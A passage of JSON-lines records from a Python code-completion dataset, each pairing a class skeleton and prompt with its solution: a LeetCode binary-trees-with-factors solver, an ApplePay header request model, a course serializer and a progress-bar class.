"revision_id": "635af6e22aa8eef8e7920a585d43a45a891a8157", "skeleton": "<|skeleton|>\nclass Solution:\n\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "code823BinaryTreesWithFactors.py", "source_repo": "cybelewang/leetcode-python", "split": "test", "star_events_count": 0} {"blob_id": "43a27f38ee70629ed5aa7de8bcacfda8c8146891", "bodies": ["self.public_key_hash = public_key_hash\nself.ephemeral_public_key = ephemeral_public_key\nself.transaction_id = transaction_id", "if dictionary is None:\n return None\nephemeral_public_key = dictionary.get('ephemeral_public_key')\npublic_key_hash = dictionary.get('public_key_hash')\ntransaction_id = dictionary.get('transaction_id')\nreturn cls(ephemeral_public_key, public_key_hash, transaction_id)"], "bodies_text": "<|body_start_0|>\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device", "class_name": "CreateApplePayHeaderRequest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000364", "length_bytes": 2190, "license_type": "permissive", "methods": [{"docstring": "Constructor for the CreateApplePayHeaderRequest class", "name": "__init__", "signature": "def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003711", "prompt": "Implement the Python class `CreateApplePayHeaderRequest` described below.\n\nClass description:\nImplementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\n\nMethod signatures and docstrings:\n- def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None): Constructor for the CreateApplePayHeaderRequest class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `CreateApplePayHeaderRequest` described below.\n\nClass description:\nImplementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\n\nMethod signatures and docstrings:\n- def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None): Constructor for the CreateApplePayHeaderRequest class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n<|end_body_1|>\n", "revision_id": "95c80c35dd57bb2a238faeaf30d1e3b4544d2298", "skeleton": "<|skeleton|>\nclass CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n", "source": "the_stack_v2_python_sparse", "source_path": "mundiapi/models/create_apple_pay_header_request.py", "source_repo": "mundipagg/MundiAPI-PYTHON", "split": "test", "star_events_count": 10} {"blob_id": "8177090727343302afe93f36330edf7e29ebb479", "bodies": ["courses = []\nuser = self.context['user']\nmodules = user.profile.purchased_modules.all()\nfor module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\nreturn courses", "for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\nreturn False"], "bodies_text": "<|body_start_0|>\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n<|end_body_0|>\n\n<|body_start_1|>\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "UserInfoSerializer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserInfoSerializer:\n\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n <|body_0|>\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n<|end_body_0|>\n\n<|body_start_1|>\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000365", "length_bytes": 5467, "license_type": "permissive", "methods": [{"docstring": "Return purchased modules embedded in courses", "name": "get_courses", "signature": "def get_courses(self, *args)"}, {"docstring": "Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.", "name": "course_in_courses", "signature": "def course_in_courses(self, mnemo, courses)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003145", "prompt": "Implement the Python class `UserInfoSerializer` described below.\n\nClass description:\nImplement the UserInfoSerializer class.\n\nMethod signatures and docstrings:\n- def get_courses(self, *args): Return purchased modules embedded in courses\n- def course_in_courses(self, mnemo, courses): Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.", "prompted_full_text": "Implement the Python class `UserInfoSerializer` described below.\n\nClass description:\nImplement the UserInfoSerializer class.\n\nMethod signatures and docstrings:\n- def get_courses(self, *args): Return purchased modules embedded in courses\n- def course_in_courses(self, mnemo, courses): Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\n\n<|skeleton|>\nclass UserInfoSerializer:\n\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n <|body_0|>\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n<|end_body_0|>\n\n<|body_start_1|>\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n<|end_body_1|>\n", "revision_id": "860d1c1214de125346c0accc4ec4b8953297231b", "skeleton": "<|skeleton|>\nclass UserInfoSerializer:\n\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n <|body_0|>\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserInfoSerializer:\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "src/user/serializers.py", "source_repo": "xgerinx/skillsitev2", "split": "test", "star_events_count": 0} {"blob_id": "c1bd690b5c0c4305db1daa6f2024ac6ab57f6972", "bodies": ["self.param = Config()\nself.param.width = width\nself.param.target = target\nself.param.time = time.time()\nself.param.n = 0\nself.param.unit_name = unit_name\nself.param.verbose = verbose\nself.param.current = 0\nif verbose:\n self.param.logger = Logger()", "if not self.param.verbose:\n return 0\nself.param.n += 1\nself.param.current += current\nif self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\nelse:\n msg = f'{self.param.current}/Unknown '\ntime_diff = time.time() - self.param.time\nif self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nelse:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nif values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\nif self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelse:\n self.param.logger.info(msg + ' ' * 4, enter=True)", "if not self.param.verbose:\n return 0\nself.param.n += 1\nif self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\nelse:\n msg = f'{current}/Unknown '\ntime_diff = time.time() - self.param.time\nif self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nelse:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nif values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\nif self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelse:\n self.param.logger.info(msg + ' ' * 4, enter=True)"], "bodies_text": "<|body_start_0|>\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_2|>\n", "class_docstring": "Displays a progress bar.", "class_name": "Progbar", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n <|body_0|>\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_1|>\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000366", "length_bytes": 4106, "license_type": "permissive", "methods": [{"docstring": "Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").", "name": "__init__", "signature": "def __init__(self, target, width=25, verbose=1, unit_name='step')"}, {"docstring": "Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).", "name": "add", "signature": "def add(self, current, values=None)"}, {"docstring": "Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).", "name": "update", "signature": "def update(self, current, values=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_test_000183", "prompt": "Implement the Python class `Progbar` described below.\n\nClass description:\nDisplays a progress bar.\n\nMethod signatures and docstrings:\n- def __init__(self, target, width=25, verbose=1, unit_name='step'): Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\n- def add(self, current, values=None): Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\n- def update(self, current, values=None): Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).", "prompted_full_text": "Implement the Python class `Progbar` described below.\n\nClass description:\nDisplays a progress bar.\n\nMethod signatures and docstrings:\n- def __init__(self, target, width=25, verbose=1, unit_name='step'): Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\n- def add(self, current, values=None): Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\n- def update(self, current, values=None): Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\n\n<|skeleton|>\nclass Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n <|body_0|>\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_1|>\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_2|>\n", "revision_id": "dbaab809939d3af52c6d57b6df0553ea18024bf4", "skeleton": "<|skeleton|>\nclass Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n <|body_0|>\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_1|>\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + 